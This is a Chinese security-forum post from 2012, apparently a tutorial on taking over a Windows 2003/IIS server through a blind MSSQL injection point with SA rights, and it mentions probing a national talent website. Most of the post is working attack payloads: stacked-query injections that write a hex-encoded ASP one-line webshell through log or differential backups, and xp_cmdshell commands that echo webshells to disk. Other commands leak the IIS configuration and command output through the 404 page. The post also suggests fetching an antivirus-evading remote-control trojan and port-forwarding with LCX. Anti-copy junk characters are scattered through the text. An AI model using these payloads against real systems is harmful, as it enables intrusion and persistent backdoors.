找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 sa权限的教程.
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1990|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
# P1 `/ Z: k: Z
; V8 Q7 g7 Q9 w9 {( a) P9 a, _! I( a1 l, t* \8 @) o
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。- p& R  _& n6 R1 T: y1 i& H
2 H9 K& r- g( H) j6 o
                                                                 
& o( U+ `/ x7 Y4 f, k4 Y, v8 G                                                                 9 Y+ e$ `- D! `
                                                                  论坛: http://www.90team.net/) E: P8 n- p  t( n7 G, i  U9 s

2 G/ A. i% v; v& c- k( X- |0 \0 r& X) f! u' j. H) n8 f$ |
8 q8 U- E; G5 F) F  Y
友情检测国家人才网, {9 l# M& w$ \8 I/ |# M$ L9 S
" E6 w, U& j7 z& I/ c5 A4 c3 @

" `3 L3 j9 F! _# M内容:MSSQL注入SA权限不显错模式下的入侵
/ s: [8 a  ~8 A, ~" ?1 f- s  f0 ~1 Y! E8 y7 }$ v
( t% v+ U/ d! ?  o
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。% ^$ A3 r% O3 m

9 X& z# @3 I# L" \8 g我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
4 a1 b% }4 t( \( R( j: z' o5 u/ [  w

' V8 q9 w+ E6 C这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
. @( Z" P7 O1 y6 A* y' k6 m; R! s7 H3 s+ Y
思路:
3 t$ v8 C& B/ {$ Y9 Y
; v/ F( R7 B5 U# Y3 |. B首先:
$ \, [1 _+ A7 \2 b2 [
6 c% i; t4 e1 k' C通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
/ r0 d+ Q: n& a+ r9 W# w& Y2 t1 `6 P8 Q3 K( k# X0 `
1.日志备份获得Webshell
' O+ H9 x9 |& ]7 R' l! v: `* X) ]  m1 b- E& j, j- J, H
2.数据库差异备份获得Webshell
  m, I* ^" h2 r8 C6 ?6 ^/ A! ~' D/ j0 U% w2 C* ?1 u
4.直接下载免杀远控木马。
1 r* k+ n8 ^9 {. R' R5 i0 ]0 {* o6 M% B! l9 E3 b7 w" a3 f( z
5.直接下载LCX将服务器端口转发出来# \* h# u6 a: `4 w" m& Q* h
" P5 }/ q- o; l$ |
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。4 g8 L+ G3 E7 l0 V5 g3 N
  ?" C5 [5 M0 y9 g' u2 F/ p- L

% _0 c: y  M7 t6 k' J
  _  X  I% J( d. c在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, 1 A3 w  ?3 v. N; r& J8 E* l6 Q
/ L; h  f& x! w  P$ G6 h
我直接演示后面一个方法
2 y* m! ]. f% Q& U* v! I+ x* Q/ m
% d+ w, ~# n7 J' y" Z1 ]% a, g) M) `
8 W, R: J; j3 G+ v" a3 W分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL - D6 J3 G4 e! {: R# u' \5 o

- T" r+ n+ L! _; n) O& L6 e5 L  _. R1 y3 X

$ T5 o2 b+ q% b" X! {' @' S1 n3 r6 R3 i2 F3 f. B
◆日志备份:" H: G7 Q6 s- J3 E
$ g! M2 e- r/ e& m
" ?; K, w' M2 m+ o0 @! J
1. 进行初始备份0 o0 t, K) f% Z+ v8 Z! {
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
5 n) l) [9 [% n1 U
0 G9 Q) \* j0 r! A- O' E0 B( J4 r2. 插入数据# `7 C2 N6 U. r- F4 M  O
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
+ j/ {5 e7 u) @$ L* l; J2 m, F& \5 k2 H2 K
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>) n8 [2 d/ P# h1 o$ c4 X* l
  . p8 K' Q$ I* M
3. 备份并获得文件,删除临时表) X3 Z: o( F9 k- J8 |) G
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--7 C6 b6 @( ?5 @- C+ j: A
' f, U& \  A/ r: m# D2 v  r, ~

3 k, ~# O; q. ~! B1 V+ r0 Y, u% b$ Q3 }! l& ~6 ^1 q+ ?
◆数据库差异备份6 P& X2 Q- h' _: w. p3 S. t
2 h6 @2 m1 t6 i0 e! h! A& r, F
(1. 进行差异备份准备工作
" S4 M- ~' A9 s3 C9 t, i9 X8 W+ c1 K  Q$ Q/ @/ D/ Q9 ^
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
3 G) @$ R4 ~7 T( `* n% y, J: O% Y' \1 [7 H0 O0 Z# r
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码0 e/ a$ I" O1 e7 Y+ b; I
, [7 M: u  O! m4 [$ M% \( i2 h

3 X" m- D0 I: T+ ^$ j4 U! x(2. 将数据写入到数据库
& |( J8 `( H+ s, c;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- # Q: o( n+ k1 ^% N# p- F& }
  ^$ f$ ^( u" d% A
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
; M. O' D0 @4 Y" [8 B
- Y0 [( C7 h, C# m" ^5 D3. 备份数据库并清理临时文件
. L6 P3 f3 c% w' R7 W' m/ P. c: E) _
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
+ s. v% |/ M* o$ L1 t  c& y2 J
' V+ t% {4 Y& q: H0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 7 C+ y/ ]* [$ b) D% c' @
4 l3 ^( r9 d) p: M% L

* ^8 j% u, p+ _# e1 a4 w  v( W, q% b2 I' Y7 g9 J6 H, q% R
用^转义字符来写ASP(一句话木马)文件的方法:   9 ]$ u* \7 S4 w! R9 R1 V) y2 a
+ H4 a8 v' v! Q& @7 J
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--+ i" @* J1 F6 t
% O7 f! ]/ b0 i2 K
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
/ w! N& g& _* R( v( y. e$ q5 p2 v
/ `; H' d. W' r* T读取IIS配置信息获取web路径5 y1 t2 T, H3 e

. x/ g, R+ ]/ B7 k) ~% p( \     % k: x- R8 B! ~/ j& G$ R
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
( n' F, |- x- c4 U6 F6 ]
6 o  H/ T, l% c9 }执行命令( I; @9 H' K; R7 ~* q
     
. T6 L) X' P& f4 L5 W7 t     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
1 V( Q" w# s3 t- Y& o
8 w$ ?+ u% w0 u; S( R
1 W/ d5 Y. P# I+ u9 l6 N& w! w/ F6 q& `+ f

: m1 y' Y5 @6 O4 k; q1 Y! p# l1 ^* e

/ {1 Q; a( v+ d1 v2 l: e+ |
9 C! K% I+ D! c% P6 p3 v3 q, X, z7 A$ k9 @
; Q( M$ @& v3 z, p

: I9 l- b* n/ B4 Z$ B/ u! x% O* J; F& |0 z6 U8 e0 {

, C- ^5 E1 N  k9 L3 S1 i# `: O1 N& h0 S+ H8 z' A) c+ [/ M

) \+ @: Y5 M/ U, `- Y9 |$ C( }
5 ]2 q$ F) U" U4 v" H4 @( _4 M7 F) m

, F' Q# \) i- E& N# T" g# t
. K' z0 }3 ]$ q# c1 W( ~
9 g6 d$ ~. H) W) X; G$ h/ y3 q6 t8 p5 s/ `4 T, t, y5 C& m

& D4 q) f8 k) k( v0 s) x$ Y& Y
6 S$ c: c# Y8 Z2 Y$ X# @
# K! E) `; B! k$ [# T( j4 i5 K/ M6 _5 K, C5 q! b

* f/ g. S& D4 l# I! S% J! h" x; a' r$ w6 ~9 r, ?$ h

  Z' E& \- j9 O* R# j8 K) ^4 H+ {1 f& d" m) o

, H% Z9 |$ A: U7 z& m
5 H( U, Q0 o$ H7 O4 _6 G  w4 Q7 i' r( s  L: ]' R

  A) f* j- w/ _  Z  W
( s2 U# |1 s0 S* `5 D
" Q4 s; y; }2 ]1 Q/ \( I, A
7 w" A/ `2 d7 u8 s* l9 Q0 V
7 d; C1 Q) o+ z
+ w9 s$ }8 ~  `. x
9 v2 \! B# x7 E8 C3 h( i3 K. Q' i( u; O7 T: x
4 ?% R8 a1 B6 T$ f$ M6 A
# \( d5 C. S3 J* e0 u9 ^

4 l7 D8 W; ]% `+ l! ^" w' [
% F8 C& n- M( y% L% a  a1 J4 d- q
% m' r+ y( C. B0 `1 v. u6 ]5 Y- R9 N" X; n0 u: u0 c
( n/ F' G$ C+ a2 N1 l; \

) k" O6 h4 {, B3 a
3 S7 M1 ]& s5 }: X! A& z( W2 P* k
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表